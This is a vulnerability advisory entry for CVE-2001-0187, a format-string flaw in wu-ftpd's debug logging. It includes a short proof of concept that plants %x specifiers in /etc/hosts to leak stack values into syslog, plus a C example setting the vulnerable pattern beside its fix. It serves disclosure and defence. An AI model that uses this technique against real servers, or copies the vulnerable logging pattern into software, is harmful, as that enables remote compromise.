Wu-ftp debug command execution vulnerability

Vulnerability ID: 1106181
Vulnerability type: Format string
Published: 2001-01-23
Updated: 2006-09-20
CVE ID: CVE-2001-0187
CNNVD-ID: CNNVD-200103-098
Platform: Unix
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/20594
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-098
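|Vulnerability details
Wu-ftp 2.6.1 and earlier versions contain a format string vulnerability when running with debug mode enabled. A remote attacker can execute arbitrary commands by way of a malformed argument in the PASV port assignment log record.
|Vulnerability exploit (EXP)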
source: http://www.securityfocus.com/bid/2296/info

Wu-ftpd is a widely used Unix FTP server. It contains a format string vulnerability that may be exploitable under certain (perhaps 'extreme') circumstances.

When running in debug mode, Wu-ftpd logs user activity to syslog in an insecure manner. An attacker with control over the server's hostname resolving facility could exploit this vulnerability to get root access remotely on the victim host. 

The following example demonstrates the vulnerability.

Note: /etc/hosts is used as the example name resolving mechanism. It could equally be DNS, NIS, etc.

Conditions:

$ grep 127.0.0.1 /etc/hosts
127.0.0.1 %x%x%x%x%x%x%x%x%x%x

$ grep ftpd /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd /tmp/wuftpd-2.6.0/src/ftpd -v

$ ncftpget -F 127.0.0.1 /tmp /usr/lib/ld.so

$ tail /var/log/syslog.debug

Jan 24 14:17:01 xxx ftpd[30912]: PASV port 47479 assigned to 80862b0806487eb9778084da87bffff16c9640151020bfffe108401c9004 [127.0.0.1]

..<snip extra output>..
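
In the syslog line above, the `%x` sequences from the resolved name were replaced by hexadecimal values, which is what happens when logged text is used as the format string. The following is an added illustration of that pattern beside its corrected form; it is not wu-ftpd source, and `log_sink` (a buffer-backed stand-in for syslog(3)), `log_pasv_vulnerable`, `log_pasv_fixed` and `hostname_is_sane` are hypothetical names.

```c
/* Added illustration, not wu-ftpd code. log_sink() is a hypothetical
 * printf-style stand-in for syslog(3) that writes to an inspectable buffer. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

static char last_line[256];

static void log_sink(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_line, sizeof last_line, fmt, ap);
    va_end(ap);
}

/* VULNERABLE pattern (shown for contrast, never called here): the resolved
 * name is merged into a message that is then used as the format string. */
void log_pasv_vulnerable(int port, const char *host, const char *addr)
{
    char msg[200];
    snprintf(msg, sizeof msg, "PASV port %d assigned to %s [%s]", port, host, addr);
    log_sink(msg);          /* untrusted text interpreted as a format */
}

/* FIXED pattern: constant format string, untrusted text only as an argument. */
const char *log_pasv_fixed(int port, const char *host, const char *addr)
{
    char msg[200];
    snprintf(msg, sizeof msg, "PASV port %d assigned to %s [%s]", port, host, addr);
    log_sink("%s", msg);
    return last_line;
}

/* Defence in depth: allow only letters, digits, '-' and '.' in a resolved name. */
int hostname_is_sane(const char *host)
{
    size_t n = strlen(host);
    return n > 0 && n < 256 && strspn(host,
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-.") == n;
}

int main(void)
{
    const char *name = "%x%x%x%x%x%x%x%x%x%x"; /* constructed, as in /etc/hosts above */
    printf("sane=%d\n%s\n", hostname_is_sane(name), log_pasv_fixed(47479, name, "127.0.0.1"));
    return 0;
}
```

With the constant `"%s"` format the name is logged literally, so the `%x` sequences appear unchanged in the log line.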
|References

Source: BID
Name: 2296
Link: http://www.securityfocus.com/bid/2296
Source: DEBIAN
Name: DSA-016
Link: http://www.debian.org/security/2001/dsa-016
Source: XF
Name: wuftp-debug-format-string
Link: http://xforce.iss.net/static/6020.php
Source: ftp.wu-ftpd.org
Link: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_current/missing_format_strings.patch
Source: CONECTIVA
Name: CLA-2001:443
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000443